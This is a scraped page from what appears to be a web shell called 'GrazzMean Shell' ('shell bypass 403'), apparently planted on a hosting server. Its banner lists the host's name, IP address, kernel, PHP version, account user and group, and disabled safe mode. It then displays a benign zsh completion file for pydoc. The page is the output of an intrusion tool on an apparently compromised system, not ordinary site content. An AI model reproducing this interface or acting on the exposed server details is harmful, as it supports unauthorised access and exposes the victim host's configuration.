shell bypass 403

GrazzMean Shell

: /usr/share/zsh/5.5.1/functions/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.129.243.102
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : _pydoc
#compdef -P pydoc[0-9.]#

local curcontext=$curcontext state state_descr line ret=1
typeset -A opt_args
local -a args

args=(
  '(- *)-k[search keyword]:keyword'
  '(-k -g -w *)-p[start web server on specified port]:port number'
  '(-)-w[write out HTML in current directory]'
  '(-)*: :->lookup'
)

if _pick_variant pydoc3='pydoc3 -b' pydoc2 -h; then
  args+=( '(-k -w *)-b[start server and open browser]' )
else
  args+=( '(- *)-g[start gui]' )
fi

_arguments -C : $args && return 0

case $state in
(lookup)
  if [[ $words[CURRENT] = */* ]]; then
    _files && ret=0
  else
    _alternative \
      'keywords:keyword:compadd ${=${${(f)"$(_call_program keywords $words[1] keywords)"}[2,-1]}}' \
      'topics:topic:compadd ${=${${(f)"$(_call_program topics $words[1] topics)"}[2,-1]}}' \
      'modules:module:_python_modules' && ret=0
  fi
esac

return ret
© 2025 GrazzMean